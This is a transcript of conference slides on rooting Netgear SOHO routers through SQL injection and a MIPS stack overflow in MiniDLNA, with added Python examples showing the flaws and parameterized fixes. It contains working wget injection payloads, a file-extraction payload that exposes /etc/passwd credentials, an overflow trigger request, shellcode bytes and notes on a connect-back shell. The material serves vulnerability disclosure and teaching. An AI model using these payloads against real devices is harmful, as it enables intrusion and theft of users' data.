From SQL Injection to MIPS Overflows · 2013-08-24
TRANSCRIPT
From SQL Injection to MIPS Overflows: Rooting SOHO Routers
Zachary Cutlip
Acknowledgements
Tactical Network Solutions
Craig Heffner
What I’m going to talk about
Novel uses of SQL injection
Buffer overflows on MIPS architecture
0-day Vulnerabilities in Netgear routers
Embedded device investigation process
Live demo: Root shell & more
Questions
Read the paper
Lots of essential details
Not enough time in this talk to cover it all
Please read it
Why attack SOHO routers?
Offers attacker privileged vantage point
Exposes multiple connected users to attack
Exposes all users’ Internet comms to snooping/manipulation
Often unauthorized side doors into enterprise networks
Target device: Netgear WNDR3700 v3
Fancy-pants SOHO Wireless Router
DLNA Multimedia server
File server w/USB storage
Very popular on Amazon
Other affected devices
Netgear WNDR 3800
Netgear WNDR 4000
Netgear WNDR 4400
First step: take it apart
UART header
UART to USB adapter
USB port
Helps analysis
Retrieve SQLite DB
Load a debugger onto the router
Analyzing the Device Software
Download firmware update from vendor, unpack
See Craig Heffner’s blog for more on firmware unpacking
http://www.devttys0.com/blog
Linux--Woo hoo!
$ binwalk ./WNDR3700v3-V1.0.0.18_1.0.14.chk
DECIMAL     HEX         DESCRIPTION
---------------------------------------------------
86          0x56        LZMA compressed data
1423782     0x15B9A6    Squashfs filesystem
$ dd if=WNDR3700v3-V1.0.0.18_1.0.14.chk of=kernel.7z bs=1 skip=86 count=1423696
$ p7zip -d kernel.7z
$ strings kernel | grep 'Linux version'
Linux version 2.6.22 ([email protected]) (gcc version 4.2.3) #1 Wed Sep 14 10:38:51 CST 2011
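As an added illustration (not part of the talk and not binwalk's own code), the scanner below mimics what binwalk did on the slide: walk the image looking for an LZMA stream header and a squashfs superblock magic, then derive the dd skip/count from the two offsets, which is how count=1423696 (1423782 - 86) comes about. The sample image, the dictionary-size heuristic and the description strings are constructed here.

```python
import struct

# Signatures this constructed scanner knows about (enough for the slide's two hits).
LZMA_PROPS = 0x5D                      # lc=3 lp=0 pb=2: the props byte nearly all LZMA streams use
SQUASHFS_MAGIC = {b"hsqs": "Squashfs filesystem, little endian",
                  b"sqsh": "Squashfs filesystem, big endian"}


def scan_firmware(blob: bytes):
    """Walk the image byte by byte; return (offset, description) for every signature hit."""
    hits = []
    for off in range(len(blob)):
        if blob[off] == LZMA_PROPS and off + 13 <= len(blob):
            dict_size = struct.unpack_from("<I", blob, off + 1)[0]
            # Heuristic (ours) to cut false positives on a lone 0x5D byte: a real LZMA
            # header carries a power-of-two dictionary size in a sane range.
            if 1 << 12 <= dict_size <= 1 << 26 and dict_size & (dict_size - 1) == 0:
                hits.append((off, "LZMA compressed data, dictionary size: %d" % dict_size))
        magic = blob[off:off + 4]
        if magic in SQUASHFS_MAGIC:
            hits.append((off, SQUASHFS_MAGIC[magic]))
    return hits


def dd_parameters(hits, index):
    """skip/count for dd(1): carve from this hit up to the next one (None if it is the last)."""
    skip = hits[index][0]
    count = hits[index + 1][0] - skip if index + 1 < len(hits) else None
    return skip, count


def build_sample_image() -> bytes:
    """Constructed stand-in image: an 86-byte vendor header, an LZMA stream header,
    filler standing in for the compressed kernel, then a squashfs superblock magic."""
    img = bytearray(b"\x00" * 86)
    img += bytes([LZMA_PROPS]) + struct.pack("<I", 1 << 23) + struct.pack("<Q", 0xFFFFFFFFFFFFFFFF)
    img += b"\x12" * 1000
    img += b"hsqs" + b"\x00" * 60
    return bytes(img)


def report(blob: bytes) -> str:
    """binwalk-style table of the hits."""
    lines = ["DECIMAL     HEX         DESCRIPTION", "-" * 51]
    for off, desc in scan_firmware(blob):
        lines.append("%-11d 0x%-9X %s" % (off, off, desc))
    return "\n".join(lines)


if __name__ == "__main__":
    image = build_sample_image()
    print(report(image))
    print("dd skip/count for the LZMA section:", dd_parameters(scan_firmware(image), 0))
```

Real firmware needs the full signature database (and the false-positive filtering) binwalk ships with; the point here is only that the offsets in the table are the carve boundaries, and that each region ends where the next signature begins.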
Target Application: MiniDLNA
What is DLNA?
Digital Living Network Alliance
Interoperability between gadgets
Multimedia playback, etc.
But Most Importantly...
Attack Surface
Google reveals: open source!
Source code analysis
'strings' reports shipping binary is 1.0.18
Download source for our version.
Search source for low-hanging fruit
SQL injection: more than meets the eye
Privileged access to data
What if the data is not sensitive or valuable?
Opportunity to violate developer assumptions
You know what happens when you assume...
Your shit gets owned.
Vulnerability 1: SQL injection
grep -rn SELECT * | grep '%s'
21 results, such as:
sprintf(sql_buf, "SELECT PATH from ALBUM_ART where ID = %s", object);
Closer look
Closer look
Album art query
Test the vulnerability
$ wget http://10.10.10.1:8200/AlbumArt/"1; INSERT/**/into/**/ALBUM_ART(ID,PATH)/**/VALUES('31337','pwned');"-throwaway.jpg
w00t! Success!
sqlite> select * from ALBUM_ART where ID=31337;
31337|pwned
Good news / Bad news
Working SQL injection
Trivial to exploit
No valuable information
Even if destroyed, DB is regenerated
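Added example, not from the talk or the MiniDLNA project: the %s query from the sprintf() above rendered in Python against an in-memory SQLite stand-in for ALBUM_ART, with the slide's injected id run through it, next to the hardened form that validates the id and binds it as a parameter (the Python analogue of the sqlite3_snprintf() fix the talk recommends at the end). The schema, the pre-existing row, and the assumption that the handler strips the "-throwaway.jpg" suffix before querying are constructed here.

```python
import re
import sqlite3

# Constructed stand-in for MiniDLNA's ALBUM_ART table (assumption: the real table
# has at least these two columns; anything else is omitted).
SCHEMA = "CREATE TABLE ALBUM_ART (ID INTEGER PRIMARY KEY AUTOINCREMENT, PATH TEXT NOT NULL)"

# The object id from the slide's wget, minus the "-throwaway.jpg" suffix (assumed to
# be stripped by the handler before the query is built).
INJECTED_ID = "1; INSERT/**/into/**/ALBUM_ART(ID,PATH)/**/VALUES('31337','pwned');"


def new_db() -> sqlite3.Connection:
    db = sqlite3.connect(":memory:")
    db.execute(SCHEMA)
    db.execute("INSERT INTO ALBUM_ART (ID, PATH) VALUES "
               "(1, '/tmp/mnt/usb0/part1/.ReadyDLNA/art_cache/cover.jpg')")  # constructed row
    db.commit()
    return db


def album_art_vulnerable(db: sqlite3.Connection, object_id: str):
    """Python rendering of
        sprintf(sql_buf, "SELECT PATH from ALBUM_ART where ID = %s", object);
    with sql_buf then handed to SQLite as a whole. The request string becomes part of
    the statement text, so a ';' ends the SELECT and starts a statement of the
    requester's choosing; executescript() runs them all, as sqlite3_exec() does."""
    sql = "SELECT PATH from ALBUM_ART where ID = %s" % object_id
    db.executescript(sql)
    # executescript() hands back no rows, so re-issue the first statement to show
    # what the handler would have served.
    row = db.execute(sql.split(";")[0]).fetchone()
    return row[0] if row else None


def album_art_safe(db: sqlite3.Connection, object_id: str):
    """Hardened form: require a plain decimal integer, then bind it as a parameter so the
    value is data to SQLite and can never be parsed as SQL."""
    if not re.fullmatch(r"[0-9]+", object_id):
        return None
    row = db.execute("SELECT PATH FROM ALBUM_ART WHERE ID = ?", (int(object_id),)).fetchone()
    return row[0] if row else None


def table_ids(db: sqlite3.Connection):
    """All IDs in ALBUM_ART, to show whether the injected INSERT landed."""
    return [r[0] for r in db.execute("SELECT ID FROM ALBUM_ART ORDER BY ID")]


if __name__ == "__main__":
    db = new_db()
    album_art_vulnerable(db, INJECTED_ID)
    print("vulnerable handler, IDs afterwards:", table_ids(db))
    db = new_db()
    print("safe handler result:", album_art_safe(db, INJECTED_ID), "IDs:", table_ids(db))
```

The validation step matters even with binding: the rest of the talk turns on rows that the developer never expected to be writable by a client, so refusing anything that is not an integer id closes the door before the database is reached.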
Vulnerability 2: Remote File Extraction
MiniDLNA Database:
sqlite> select * from ALBUM_ART;
1|/tmp/mnt/usb0/part1/.ReadyDLNA//art_cache/tmp/shares/USB_Storage/01 - Unforgivable (First State Remix).jpg
Test the Vulnerability
$ wget http://10.10.10.1:8200/AlbumArt/"1;INSERT/**/into/**/ALBUM_ART(ID,PATH)/**/VALUES('31337','/etc/passwd');"-throwaway.jpg
$ wget http://10.10.10.1:8200/AlbumArt/31337-18.jpg
Passwords
$ cat 31337-18.jpg
nobody:*:0:0:nobody:/:/bin/sh
admin:qw12QW!@:0:0:admin:/:/bin/sh
guest:guest:0:0:guest:/:/bin/sh
admin:qw12QW!@:0:0:admin:/:/bin/sh
Vulnerability 3: Remote Code Execution
i.e., pop root
Party like it’s 1996.
$ find . -name \*.c -print | xargs grep -E \
    'sprintf\(|strcat\(|strcpy\(' | \
    grep -v asprintf | wc -l
265 <--OMG exploit city
265 <--No, seriously. WTF.
Left join
Left join
album_art in sprintf() is DETAILS.ALBUM_ART.
Schema shows it’s an INT.
sqlite> .schema DETAILS
CREATE TABLE DETAILS ( ID INTEGER PRIMARY KEY AUTOINCREMENT, ..., ALBUM_ART INTEGER DEFAULT 0, ...);
Two things to note
DETAILS.ALBUM_ART is an INT, but it can store arbitrary data
This is due to "type affinity"
callback() attempts to "validate" using atoi(), but this is busted
atoi("1_omg_learn_to_c0d3") == 1
ALBUM_ART need only start with a (non-zero) int
Weak sauce
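Added example (not from the talk or MiniDLNA) showing both points above against an in-memory SQLite table cut down to the ALBUM_ART column from the .schema output: an INTEGER column accepting text through type affinity, a Python copy of C atoi() semantics that passes the slide's "1_omg_learn_to_c0d3", and the stricter check a consumer of the column should make. The row contents and the function names are constructed.

```python
import re
import sqlite3

# Abbreviated from the .schema DETAILS output on the slide; other columns omitted.
SCHEMA = """CREATE TABLE DETAILS (
    ID INTEGER PRIMARY KEY AUTOINCREMENT,
    ALBUM_ART INTEGER DEFAULT 0
)"""


def new_db() -> sqlite3.Connection:
    db = sqlite3.connect(":memory:")
    db.execute(SCHEMA)
    db.execute("INSERT INTO DETAILS (ID, ALBUM_ART) VALUES (3, 1)")   # constructed row
    db.commit()
    return db


def set_album_art(db: sqlite3.Connection, row_id: int, value):
    """SQLite accepts this even when value is text: INTEGER is an affinity (a conversion
    preference), not a constraint, so text that is not a well-formed number is stored as-is."""
    db.execute("UPDATE DETAILS SET ALBUM_ART = ? WHERE ID = ?", (value, row_id))
    db.commit()


def get_album_art(db: sqlite3.Connection, row_id: int):
    """(typeof, value) as SQLite actually stores it. A C caller going through
    sqlite3_exec() only ever sees the text form in its callback."""
    return db.execute("SELECT typeof(ALBUM_ART), ALBUM_ART FROM DETAILS WHERE ID = ?",
                      (row_id,)).fetchone()


def atoi(s: str) -> int:
    """C atoi(): skip whitespace, optional sign, read leading digits, ignore the rest;
    no digits at all gives 0."""
    m = re.match(r"\s*([+-]?[0-9]+)", s)
    return int(m.group(1)) if m else 0


def passes_callback_check(value) -> bool:
    """The weak check the talk describes: callback() only requires atoi() to be non-zero."""
    return atoi(str(value)) != 0


def is_valid_album_art_id(value) -> bool:
    """Stricter check: the stored value must really be an integer, not text that merely
    starts with one. The C equivalent is sqlite3_column_type() == SQLITE_INTEGER, or
    strtol() with an end-pointer check that the whole string was consumed."""
    return isinstance(value, int) and not isinstance(value, bool) and value > 0


if __name__ == "__main__":
    db = new_db()
    set_album_art(db, 3, "1_omg_learn_to_c0d3")
    kind, value = get_album_art(db, 3)
    print("stored as %s: %r" % (kind, value))
    print("atoi check passes:", passes_callback_check(value))
    print("strict check passes:", is_valid_album_art_id(value))
```

Well-formed text such as "7" is converted to an integer on the way in, which is why the declared type looks trustworthy in normal operation; only a value that fails conversion exposes the gap, and that is exactly the value an attacker with write access to the database will supply.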
Exploitable buffer overflow?
We have full control over the DB from Vuln #1
We need to:
Stage shellcode in database
Trigger query of our staged data
SQL injection limitation
Limited length of SQL injection, approx. 128 bytes per pass.
Target buffer is 512 bytes.
SQLite concatenation operator: "||"
UPDATE DETAILS set ALBUM_ART=ALBUM_ART||'AAAA' where ID=3
Trigger query of staged exploit
Model DLNA in Python
Python Coherence library
Capture conversation in Wireshark
Save SOAP request for playback with wget
Wireshark capture
SOAP request
Things you need
Console access to the device
There is a UART header on the PCB
gdbserver cross-compiled for MIPS
gdb compiled for MIPS target architecture
Test the vulnerability
Attach gdbserver on the target to minidlna.exe
Connect local gdb to remote session
Use wget to SQL inject overflow data
Set up initial records in OBJECTS and DETAILS
Build up overflow data
Use wget to POST the SOAP request
How much overflow data?
Trigger the exploit
$ wget http://10.10.10.1:8200/ctl/ContentDir \
    --header="Host: 10.10.10.1" \
    --header='SOAPACTION: "urn:schemas-upnp-org:service:ContentDirectory:1#Browse"' \
    --header='content-type: text/xml ;charset="utf-8"' \
    --header="connection: close" \
    --post-file=./soaprequest.xml
w00t! Success!
We control the horizontal and the vertical
We own the program counter, and therefore execution
Also all “S” registers: $S0-$S8
Useful for Return Oriented Programming exploit
Owning $PC is great, but give me a shell
Getting Execution: Challenges
Stack ASLR
MIPS Architecture idiosyncrasies
Return Oriented Programming is limited (but possible)
“Bad” Characters due to HTTP & SQL
Getting Execution: Advantages
No ASLR for executable, heap, & libraries
Executable stack
ROP on MIPS
All MIPS instructions are 4-bytes
All MIPS memory access must be 4-byte aligned
No jumping into the middle of instructions
ROP on MIPS
We can return into useful instruction sequences:
Manipulate registers
Load $PC from registers or memory we control
Help locate stack, defeating ASLR
Locate stack using ROP
Load several offsets from stack pointer into $S3,$S4,$S6
Load $S0 into $T9 and jump
MIPS cache coherency
MIPS has two parallel caches:
Instruction Cache
Data Cache
Payload written to the stack as data
Resides in data cache until flushed
MIPS Cache Coherency
Can’t execute off stack until cache is flushed
Write lots to memory, trigger flush?
Cache is often 32K-64K
Linux provides cacheflush() system call
ROP into it
Bad characters
Common challenge with shellcode
Spaces break HTTP
Null bytes break strcpy()/sprintf()
SQLite also has bad characters
e.g., 0x0d, carriage return
SQLite escape to the rescue: x'0d'
"\x7a\x69\xce\xe4\xff", "x'0d'", "\x3c\x0a\x0a\xad\x35"
NOP Instruction
MIPS NOP is \x00\x00\x00\x00
Use some other inert instruction
I used:
nor t6,t6,zero
\x27\x70\xc0\x01
Trouble with Encoders
Metasploit payload + XOR Encoder == No Joy
Metasploit only provides one of each on MIPS
Caching problem?
Wrote my own NUL-safe connect-back payload
No need for encoder
Pro Tip: Avoid endianness problems by connecting back to 10.10.10.10
Overflow diagram
Demo Time
How to suck less hard
Establish security requirements
Self protection
Network protection
Less crappy programming
sqlite3_snprintf()
Privilege separation
Mandatory Access Controls, e.g. SELinux
Upshot
Developer assumes well-formed data
Compromise database integrity, violate developer assumptions
Even if the database is low value
Questions?